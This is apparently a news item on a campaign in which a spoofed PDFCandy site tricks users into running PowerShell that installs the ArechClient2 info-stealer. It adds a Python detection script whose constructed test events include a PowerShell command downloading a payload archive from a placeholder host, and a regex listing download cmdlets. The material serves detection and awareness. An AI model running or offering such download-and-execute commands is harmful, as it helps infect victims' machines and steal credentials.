141/68 Thursday, April 17, 2025

Cybersecurity researchers at CloudSEK have uncovered a sophisticated malware campaign involving a fake version of the legitimate site PDFCandy[.]com, designed to trick users into downloading ArechClient2, an info-stealing malware from the SectopRAT family active since 2019. The campaign relies on malicious Google Ads and fake software update prompts to distribute the malware stealthily, with the primary goal of stealing browser-stored credentials and personal information.
The fake site closely mimics the legitimate PDFCandy interface, using a similar domain name and identical design to deceive users. Upon visiting the spoofed site, users are prompted to upload a PDF file for conversion to DOCX. The page displays a fake loading animation and a fake CAPTCHA, which builds credibility while advancing the attacker's social engineering strategy. Victims are then instructed to run a PowerShell command, which downloads a malicious archive named “adobe[.]zip”. This archive contains an executable named “audiobit[.]exe”, which deploys the ArechClient2 malware onto the victim's system.
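As an added illustration (not from the article or from CloudSEK's research), the following Python script runs a few detection rules over constructed process-creation events that mirror the delivery chain described above: PowerShell performing a download that names adobe.zip, followed by audiobit.exe launching from a user-writable directory with PowerShell as its parent. The event fields, file paths, PIDs and the example.invalid URL are assumptions; only the two file names come from the article.

```python
"""Toy detection logic for the fake-PDFCandy / ArechClient2 delivery chain.

The events below are CONSTRUCTED samples (not real telemetry), loosely
shaped like Sysmon process-creation records. Only the indicator names
adobe.zip and audiobit.exe come from the article; paths, PIDs and the
URL are assumptions."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    # Stage 1 (constructed): user pastes the PowerShell command from the fake site.
    {"pid": 4410, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -c \"iwr https://example.invalid/adobe.zip -OutFile $env:TEMP\\adobe.zip\""},
    # Stage 2 (constructed): extracted payload runs from the user's Temp directory.
    {"pid": 4411, "image": r"C:\Users\alice\AppData\Local\Temp\adobe\audiobit.exe",
     "parent": PS, "cmd": r"C:\Users\alice\AppData\Local\Temp\adobe\audiobit.exe"},
    # Benign PowerShell usage that must not fire any rule.
    {"pid": 5000, "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "powershell -c Get-ChildItem C:\\Users\\alice\\Documents"},
]

# Common download primitives seen in PowerShell one-liners (generic, not page-specific).
DOWNLOAD_CMDLETS = re.compile(
    r"\b(iwr|invoke-webrequest|curl|wget|downloadfile|downloadstring|start-bitstransfer)\b", re.I)
ARCHIVE_IOC = re.compile(r"adobe\.zip", re.I)          # file name reported by the article
PAYLOAD_IOC = re.compile(r"\\audiobit\.exe$", re.I)    # file name reported by the article
USER_WRITABLE = re.compile(r"\\(temp|downloads|appdata)\\", re.I)


def classify(event):
    """Return the names of every rule that fires for one process-creation event."""
    hits = []
    image, cmd, parent = event["image"].lower(), event["cmd"], event["parent"].lower()
    if image.endswith("powershell.exe") and DOWNLOAD_CMDLETS.search(cmd):
        hits.append("powershell_download")
        if ARCHIVE_IOC.search(cmd):
            hits.append("ioc_adobe_zip")
    if PAYLOAD_IOC.search(event["image"]):
        hits.append("ioc_audiobit_exe")
    # Behavioural rule: PowerShell launching an executable from a user-writable path.
    if USER_WRITABLE.search(event["image"]) and parent.endswith("powershell.exe"):
        hits.append("powershell_spawned_exe_from_user_dir")
    return hits


def scan(events):
    """Map pid -> fired rules for every event that matched at least one rule."""
    return {e["pid"]: hits for e in events if (hits := classify(e))}
```

The behavioural rule (PowerShell spawning an executable from Temp/Downloads/AppData) is the one worth keeping once the file names rotate, since the indicator rules only match this specific campaign.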
The FBI previously issued a warning on March 17, 2025, about cybercriminals exploiting online file conversion services to spread malware. These bad actors often target users of free tools for converting files or downloading media, such as PDFs, DOCX, MP3s, and videos. Users are strongly advised to scrutinize URLs carefully before uploading any files, avoid following suspicious prompts, and never execute unknown scripts or downloads, especially from sites offering free online services. Failure to do so may result in silent infection by malware capable of stealing sensitive data.
Source: https://hackread.com/fake-pdfcandy-websites-spread-malware/